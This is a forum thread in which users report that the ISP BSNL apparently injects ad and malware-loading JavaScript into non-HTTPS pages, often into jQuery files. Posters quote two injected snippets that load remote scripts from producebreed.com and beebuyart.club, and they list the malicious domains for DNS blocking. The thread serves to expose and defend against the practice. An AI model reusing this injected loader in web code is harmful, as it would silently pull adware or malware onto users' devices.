BSNL is inserting ads in websites, sending their users to malware sites through malware code injection

Sooner the better 🙏
 
Last edited:
It appears the old way of injecting the code that gets pulled from servers hosted by BSNL has changed.

On tracking the popups, the following code gets injected to the JS file served from the non-HTTPS website (mostly jquery related files)

JavaScript:
document.addEventListener('DOMContentLoaded', function() {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://producebreed.com/rveYQkug53SsOr/6933?ndn=er';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
}, false);

The particular JS gets called once the page gets loaded and adds some more JS code from the URL http://producebreed.com/rveYQkug53SsOr/6933?ndn=er. The second and third part of the URL varies dynamically. But so far I noticed the JS being served only from producebreed.com, however I'm sure there would be many other such domains being used.

Now this javascript triggers popups from a whole bunch of other domains like areantaid.site, arcaptart.site, allashark.site

This is a very shady move from BSNL just to get some ad revenue and is subjecting the users to malware/adware. The majority of BSNL's users may not be technically savvy to realise this or add measures to block such things causing their devices to be infected by such malware/adware.
 
Another domain being used beebuyart.club 😡

JavaScript:
document.addEventListener('DOMContentLoaded', function() {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://beebuyart.club/rJCq50N0NFLDj/6932?ndn=ch2';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
}, false);
 
They have malware sitting on their servers.
When I was using BSNL BB, I used to get shady pops every now and then. This is seriously f**ked up, but some ISP uses Injection for bill payment reminders too.
But no other ISP in my knowledge do these kinda shit.
 


Yep for both. So for now I've blocked the malicious domains which are part of this at the DNS level. The domains are
areantaid.site
arcaptart.site
allashark.site
producebreed.com
beebuyart.club
allashail.club

KwkFwtk.png


I also noticed that for most sites I checked, they seem to target the jquery JS file. And this in some cases is not even hosted by affected site, its hosted by Google but then they are linking to the non-HTTPS version.

Here is the modified jquery JS file fetched from http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js


Source
 
Last edited:

Similar threads

Back